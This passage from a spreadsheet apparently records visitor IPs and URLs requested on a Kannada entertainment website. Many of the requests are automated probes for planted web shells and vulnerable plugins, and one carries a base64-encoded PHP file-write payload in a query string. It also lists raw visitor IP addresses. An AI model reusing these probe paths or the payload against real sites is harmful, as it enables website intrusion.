    <t>https://www.sandesh711.com/fitness-and-nutrition/top-5-supplements-to-gain-lean-muscle-mass/</t>
  </si>
  <si>
    <t>54.163.32.225</t>
  </si>
  <si>
    <t>54.158.95.82</t>
  </si>
  <si>
    <t>54.86.29.175</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/top-10-roadies-contestants-of-all-time/</t>
  </si>
  <si>
    <t>35.172.128.23</t>
  </si>
  <si>
    <t>18.207.156.245</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/kannada-serial-actress/</t>
  </si>
  <si>
    <t>223.231.188.139</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Antra&amp;date=2023-11-29</t>
  </si>
  <si>
    <t>102.45.227.30</t>
  </si>
  <si>
    <t>83.110.181.224</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Ushasi&amp;date=2024-07-24</t>
  </si>
  <si>
    <t>42.106.178.37</t>
  </si>
  <si>
    <t>94.156.66.165</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xiwsztat.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/mpersyic.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>41.216.188.18</t>
  </si>
  <si>
    <t>152.59.162.80</t>
  </si>
  <si>
    <t>154.38.180.57</t>
  </si>
  <si>
    <t>144.126.136.157</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/fix/up.php</t>
  </si>
  <si>
    <t>1.94.203.12</t>
  </si>
  <si>
    <t>205.210.31.11</t>
  </si>
  <si>
    <t>205.253.126.42</t>
  </si>
  <si>
    <t>103.91.180.29</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-movies/%E0%B2%AD%E0%B3%82%E0%B2%AE%E0%B2%BF%E0%B2%95%E0%B2%BE-%E0%B2%B6%E0%B3%86%E0%B2%9F%E0%B3%8D%E0%B2%9F%E0%B2%BF-%E0%B2%95%E0%B2%A8%E0%B3%8D%E0%B2%A8%E0%B2%A1-%E0%B2%A8%E0%B2%9F%E0%B2%BF-%E0%B2%AC/</t>
  </si>
  <si>
    <t>3.88.87.115</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tamil-movies/%E0%B2%AC%E0%B3%86%E0%B2%9F%E0%B3%8D%E0%B2%9F%E0%B2%BF%E0%B2%82%E0%B2%97%E0%B3%8D-%E0%B2%86%E0%B2%AA%E0%B3%8D-%E0%B2%AA%E0%B3%8D%E0%B2%B0%E0%B2%95%E0%B2%B0%E0%B2%A3%E0%B2%A6%E0%B2%B2%E0%B3%8D%E0%B2%B2/</t>
  </si>
  <si>
    <t>156.207.139.98</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/category/updates/</t>
  </si>
  <si>
    <t>https://sandesh711.com/view.php?name=Suriya+Praba</t>
  </si>
  <si>
    <t>https://www.youtube.com/</t>
  </si>
  <si>
    <t>154.38.175.35</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-ver.php</t>
  </si>
  <si>
    <t>69.122.180.107</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/body-positivity-influencers/</t>
  </si>
  <si>
    <t>https://www.bing.com/</t>
  </si>
  <si>
    <t>198.235.24.155</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/hehehehe.php</t>
  </si>
  <si>
    <t>51.79.137.191</t>
  </si>
  <si>
    <t>https://google.com</t>
  </si>
  <si>
    <t>54.87.200.52</t>
  </si>
  <si>
    <t>3.81.42.133</t>
  </si>
  <si>
    <t>175.157.160.26</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Dounia&amp;date=2024-06-05</t>
  </si>
  <si>
    <t>18.207.0.228</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/%E0%B2%95%E0%B3%8D%E0%B2%AF%E0%B2%BE%E0%B2%82%E0%B2%A1%E0%B2%BF%E0%B2%B8%E0%B3%8D-%E0%B2%B9%E0%B2%AB%E0%B3%80%E0%B2%A8%E0%B3%8D/</t>
  </si>
  <si>
    <t>18.209.49.4</t>
  </si>
  <si>
    <t>https://sandesh711.com/viewupdate.php</t>
  </si>
  <si>
    <t>175.44.42.14</t>
  </si>
  <si>
    <t>http://www.trafficguide.shop/</t>
  </si>
  <si>
    <t>41.216.188.168</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/inputs.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/inputs.php</t>
  </si>
  <si>
    <t>107.189.31.133</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/?author=2</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/author/admin/</t>
  </si>
  <si>
    <t>198.235.24.128</t>
  </si>
  <si>
    <t>75.220.104.95</t>
  </si>
  <si>
    <t>144.126.152.23</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-admin/wp-ldd.php?a=c</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-admin/wp-add.php?a=c</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-ldd.php?a=c</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-add.php?a=c</t>
  </si>
  <si>
    <t>54.152.84.187</t>
  </si>
  <si>
    <t>54.145.255.4</t>
  </si>
  <si>
    <t>62.74.3.253</t>
  </si>
  <si>
    <t>34.18.86.167</t>
  </si>
  <si>
    <t>103.171.246.231</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Ridhi%20Dogra&amp;date=2023-12-22</t>
  </si>
  <si>
    <t>213.202.233.34</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/simple.php</t>
  </si>
  <si>
    <t>178.24.229.40</t>
  </si>
  <si>
    <t>205.210.31.30</t>
  </si>
  <si>
    <t>86.21.135.211</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Jennifer%20Marie%20Model&amp;date=2023-11-30</t>
  </si>
  <si>
    <t>91.92.243.31</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/inputs.php</t>
  </si>
  <si>
    <t>http://www.newbieseoblog.online/</t>
  </si>
  <si>
    <t>94.156.68.167</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/zdulokcx.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ooeyowjr.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view_all.php?name=Surekha%20Vani</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view_all.php?name=Khushi%20Mukherjee</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/oqqaehvg.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wfqfowyy.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2024/08/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/bollywood-movies/best-irrfan-khan-movies-to-not-miss/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2024/06/</t>
  </si>
  <si>
    <t>70.113.107.23</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/general.php?pd=1&amp;mapname=ova.html&amp;a=vx000&amp;dstr=@Ovatools</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/sample.php?pd=1&amp;mapname=ova.html&amp;a=vx000&amp;dstr=@Ovatools</t>
  </si>
  <si>
    <t>45.94.31.237</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-aa.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/general.php?pd=1&amp;mapname=ova.html&amp;a=vx000&amp;dstr=@Ovatools</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/sample.php?pd=1&amp;mapname=ova.html&amp;a=vx000&amp;dstr=@Ovatools</t>
  </si>
  <si>
    <t>178.159.37.39</t>
  </si>
  <si>
    <t>89.248.174.182</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/background-image-cropper/ups.php</t>
  </si>
  <si>
    <t>182.70.43.20</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Malvika%20Sharma&amp;date=2023-03-15</t>
  </si>
  <si>
    <t>185.211.6.82</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/uncategorized/the-influence-of-new-age-talents-in-kannada-cinema-raj-b-shetty-rakshit-shetty-and-rishab-shetty/</t>
  </si>
  <si>
    <t>android-app://com.google.android.gm/</t>
  </si>
  <si>
    <t>86.48.6.195</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/widgets/include.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/images/include.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/core-plugin/include.php</t>
  </si>
  <si>
    <t>198.235.24.146</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/wp-theme-editor/include.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-includes/widgets/include.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-includes/images/include.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/core-plugin/include.php</t>
  </si>
  <si>
    <t>156.67.110.51</t>
  </si>
  <si>
    <t>193.186.4.137</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Sruthi%20Hariharan</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/mah.php</t>
  </si>
  <si>
    <t>123.6.49.12</t>
  </si>
  <si>
    <t>http://baidu.com/</t>
  </si>
  <si>
    <t>106.220.62.139</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Sunayana%20Fozdar</t>
  </si>
  <si>
    <t>45.94.31.93</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/?of=1</t>
  </si>
  <si>
    <t>185.194.217.78</t>
  </si>
  <si>
    <t>162.243.4.24</t>
  </si>
  <si>
    <t>68.178.148.82</t>
  </si>
  <si>
    <t>51.159.30.40</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/simple.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/chosen.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/style.php</t>
  </si>
  <si>
    <t>43.157.5.116</t>
  </si>
  <si>
    <t>198.235.24.129</t>
  </si>
  <si>
    <t>94.156.64.71</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-apxupx.php?apx=upx</t>
  </si>
  <si>
    <t>104.244.74.171</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/leonilla-shwetha-dsouza/</t>
  </si>
  <si>
    <t>android-app://org.telegram.messenger/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/chosen.php</t>
  </si>
  <si>
    <t>193.138.195.64</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/download-plugin/wp-access.php</t>
  </si>
  <si>
    <t>176.57.150.212</t>
  </si>
  <si>
    <t>152.42.161.1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/jp.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/edit.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/dropdown.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/link.php</t>
  </si>
  <si>
    <t>175.44.42.20</t>
  </si>
  <si>
    <t>http://www.sestarblog.shop/</t>
  </si>
  <si>
    <t>194.163.145.202</t>
  </si>
  <si>
    <t>27.115.124.45</t>
  </si>
  <si>
    <t>27.115.124.101</t>
  </si>
  <si>
    <t>27.115.124.53</t>
  </si>
  <si>
    <t>43.157.27.5</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-theme-editor/include.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/WordPressCore/include.php</t>
  </si>
  <si>
    <t>91.92.252.90</t>
  </si>
  <si>
    <t>43.157.25.217</t>
  </si>
  <si>
    <t>188.166.250.49</t>
  </si>
  <si>
    <t>166.196.86.34</t>
  </si>
  <si>
    <t>185.5.165.130</t>
  </si>
  <si>
    <t>167.172.90.186</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/index/function.php</t>
  </si>
  <si>
    <t>3.88.104.149</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/telugu-movies/%E0%B2%86%E0%B2%82%E0%B2%A7%E0%B3%8D%E0%B2%B0%E0%B2%AA%E0%B3%8D%E0%B2%B0%E0%B2%A6%E0%B3%87%E0%B2%B6-%E0%B2%9A%E0%B2%BF%E0%B2%A8%E0%B3%8D%E0%B2%A8-%E0%B2%95%E0%B2%B3%E0%B3%8D%E0%B2%B3%E0%B2%A4/</t>
  </si>
  <si>
    <t>198.235.24.148</t>
  </si>
  <si>
    <t>45.66.231.34</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/idqxkvwj.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ytsaefhm.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/?of=1</t>
  </si>
  <si>
    <t>45.94.31.211</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt</t>
  </si>
  <si>
    <t>128.199.210.74</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin/uploads/images/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/meta/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin/images/slider/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin/fckeditor/editor/filemanager/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/sites/default/files/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin/controller/extension/extension/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/modules/mod_simplefileuploadv1.3/elements/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/components/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/random_compat/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/Requests/Auth/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/Text/Diff/Engine/Engine/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/images/wlw/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/Requests/Exception/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/Requests/Exception/HTTP/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/Requests/Utility/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/Requests/Response/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/Requests/Transport/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/Requests/Proxy/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/Requests/Cookie/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/php/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/Assets/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/images/stories/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/plugins/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/system/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/template/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/shop/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/files/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin/editor/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/include/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/assets/images/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/Public/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/vendor/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/local/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/modules/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/Site/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/images/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/assets/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/vendor/phpunit/phpunit/src/Util/PHP/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/upload/image/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ALFA_DATA/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-knownold/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/uploads/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/upload/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin/uploads/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/Admin/uploads/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/classic/inc/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/ninja-forms/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/mu-plugins-old/</t>
  </si>
  <si>
    <t>139.99.220.135</t>
  </si>
  <si>
    <t>144.126.149.172</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/Mshell.php</t>
  </si>
  <si>
    <t>45.92.1.17</t>
  </si>
  <si>
    <t>104.196.106.130</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/acme-challenge/atomlib.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/woh.php</t>
  </si>
  <si>
    <t>175.44.42.15</t>
  </si>
  <si>
    <t>http://www.xtrafficplus.shop/</t>
  </si>
  <si>
    <t>45.94.31.141</t>
  </si>
  <si>
    <t>49.206.62.19</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view_all.php?name=Neha%20Saha</t>
  </si>
  <si>
    <t>205.210.31.27</t>
  </si>
  <si>
    <t>185.225.33.103</t>
  </si>
  <si>
    <t>https://google.com/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-movies/exploring-the-journey-of-yaana-a-kannada-cinematic-gem/</t>
  </si>
  <si>
    <t>185.225.33.104</t>
  </si>
  <si>
    <t>43.131.2.238</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-ldd.php?a=c</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-add.php?a=c</t>
  </si>
  <si>
    <t>91.208.75.4</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/stylewithplixxi-real-name/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/china.php</t>
  </si>
  <si>
    <t>27.115.124.70</t>
  </si>
  <si>
    <t>123.6.49.15</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/updates-17-june-2024/</t>
  </si>
  <si>
    <t>45.154.98.222</t>
  </si>
  <si>
    <t>193.26.115.188</t>
  </si>
  <si>
    <t>205.210.31.48</t>
  </si>
  <si>
    <t>201.32.91.83</t>
  </si>
  <si>
    <t>193.26.115.73</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/wp-cns-product/</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/incache/</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/wp-police-staging/</t>
  </si>
  <si>
    <t>91.92.242.199</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/include.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/include.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/WordPressCore-1/include.php</t>
  </si>
  <si>
    <t>152.58.196.195</t>
  </si>
  <si>
    <t>51.15.184.67</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/inputs.php</t>
  </si>
  <si>
    <t>210.16.94.219</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Kajal%20Agarwal</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Scarlett%20M%20Rose</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Gayathiri%20Iyer</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-movies/%e0%b2%ad%e0%b3%82%e0%b2%ae%e0%b2%bf%e0%b2%95%e0%b2%be-%e0%b2%b6%e0%b3%86%e0%b2%9f%e0%b3%8d%e0%b2%9f%e0%b2%bf-%e0%b2%95%e0%b2%a8%e0%b3%8d%e0%b2%a8%e0%b2%a1-%e0%b2%a8%e0%b2%9f%e0%b2%bf-%e0%b2%ac/</t>
  </si>
  <si>
    <t>175.44.42.133</t>
  </si>
  <si>
    <t>http://www.xtrafficplus.online/</t>
  </si>
  <si>
    <t>91.92.252.142</t>
  </si>
  <si>
    <t>91.92.252.177</t>
  </si>
  <si>
    <t>91.92.240.138</t>
  </si>
  <si>
    <t>27.115.124.118</t>
  </si>
  <si>
    <t>123.6.49.18</t>
  </si>
  <si>
    <t>27.115.124.6</t>
  </si>
  <si>
    <t>91.92.252.83</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/WordPressCore/include.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/include.php</t>
  </si>
  <si>
    <t>94.156.66.104</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/google-seo-rank/module.php</t>
  </si>
  <si>
    <t>42.105.164.112</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Monalisa</t>
  </si>
  <si>
    <t>91.92.243.143</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/google-seo-rank/README.txt</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/incache/</t>
  </si>
  <si>
    <t>152.58.199.118</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Trisha%20Krishnan&amp;date=2023-12-01</t>
  </si>
  <si>
    <t>139.99.220.157</t>
  </si>
  <si>
    <t>45.154.98.195</t>
  </si>
  <si>
    <t>91.92.242.152</t>
  </si>
  <si>
    <t>94.156.68.8</t>
  </si>
  <si>
    <t>152.57.151.147</t>
  </si>
  <si>
    <t>49.37.50.137</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Monami%20Ghosh</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/</t>
  </si>
  <si>
    <t>101.191.133.53</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Swagatha%20S%20Krishnan</t>
  </si>
  <si>
    <t>43.157.111.74</t>
  </si>
  <si>
    <t>175.44.42.132</t>
  </si>
  <si>
    <t>http://www.xtrafficplus.xyz/</t>
  </si>
  <si>
    <t>91.92.244.113</t>
  </si>
  <si>
    <t>94.156.65.48</t>
  </si>
  <si>
    <t>205.210.31.13</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/google-seo-rank/module.php</t>
  </si>
  <si>
    <t>https://sandesh711.com/viewup.php</t>
  </si>
  <si>
    <t>35.235.81.103</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/google-seo-rank/README.txt</t>
  </si>
  <si>
    <t>41.216.188.113</t>
  </si>
  <si>
    <t>94.156.66.199</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/themes/include.php</t>
  </si>
  <si>
    <t>94.156.71.219</t>
  </si>
  <si>
    <t>94.156.68.34</t>
  </si>
  <si>
    <t>94.156.69.36</t>
  </si>
  <si>
    <t>167.172.67.152</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xxc.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wb.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-seo.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/epinyins.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/x/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/cjfuns.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/acme-challenge/license.php</t>
  </si>
  <si>
    <t>3.91.98.91</t>
  </si>
  <si>
    <t>62.169.17.233</t>
  </si>
  <si>
    <t>45.94.31.69</t>
  </si>
  <si>
    <t>205.210.31.147</t>
  </si>
  <si>
    <t>91.92.245.111</t>
  </si>
  <si>
    <t>94.156.69.127</t>
  </si>
  <si>
    <t>194.26.192.72</t>
  </si>
  <si>
    <t>162.55.25.102</t>
  </si>
  <si>
    <t>205.210.31.46</t>
  </si>
  <si>
    <t>213.32.44.122</t>
  </si>
  <si>
    <t>175.44.42.43</t>
  </si>
  <si>
    <t>http://www.erias.xyz/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ss.php?c_c</t>
  </si>
  <si>
    <t>223.123.109.85</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Sanjeeda%20Shaikh&amp;date=2023-11-04</t>
  </si>
  <si>
    <t>157.45.76.89</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view_all.php?name=Shubha%20Poonja</t>
  </si>
  <si>
    <t>107.189.14.233</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/ss.php?c_c</t>
  </si>
  <si>
    <t>91.92.250.149</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/lrcrguni.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/themes/seotheme/db.php?u</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-plain.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/cxrpcobm.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/alfacgiapi/perl.alfa</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/ALFA_DATA/alfacgiapi/perl.alfa</t>
  </si>
  <si>
    <t>82.165.103.249</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/themes/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/uploads/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/wp-cron.php?ac=3</t>
  </si>
  <si>
    <t>94.156.65.96</t>
  </si>
  <si>
    <t>41.216.188.206</t>
  </si>
  <si>
    <t>205.210.31.129</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-biocomputing-installed/</t>
  </si>
  <si>
    <t>64.227.170.5</t>
  </si>
  <si>
    <t>54.90.113.174</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/pwnd/pwnd.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/www.sandesh711.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1</t>
  </si>
  <si>
    <t>41.216.188.165</t>
  </si>
  <si>
    <t>https://sandesh711.com/wp.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-catcher/3.1415926535898.php</t>
  </si>
  <si>
    <t>152.58.38.174</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Hitesha%20Chandranee</t>
  </si>
  <si>
    <t>178.159.37.38</t>
  </si>
  <si>
    <t>82.36.154.96</t>
  </si>
  <si>
    <t>45.125.66.223</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/hosting.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-catcher/admin.php</t>
  </si>
  <si>
    <t>45.141.215.25</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/class.api.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/cong.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3Bjanl2LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>94.156.69.126</t>
  </si>
  <si>
    <t>91.92.254.72</t>
  </si>
  <si>
    <t>85.190.242.28</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2pscHV3LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>91.92.241.27</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ulqfraum.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/sdihbtsf.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>198.235.24.19</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-l0gin.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/ext.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/slrcld.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ixhdlv.php</t>
  </si>
  <si>
    <t>184.164.76.181</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/bless.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-ver.php</t>
  </si>
  <si>
    <t>206.189.90.81</t>
  </si>
  <si>
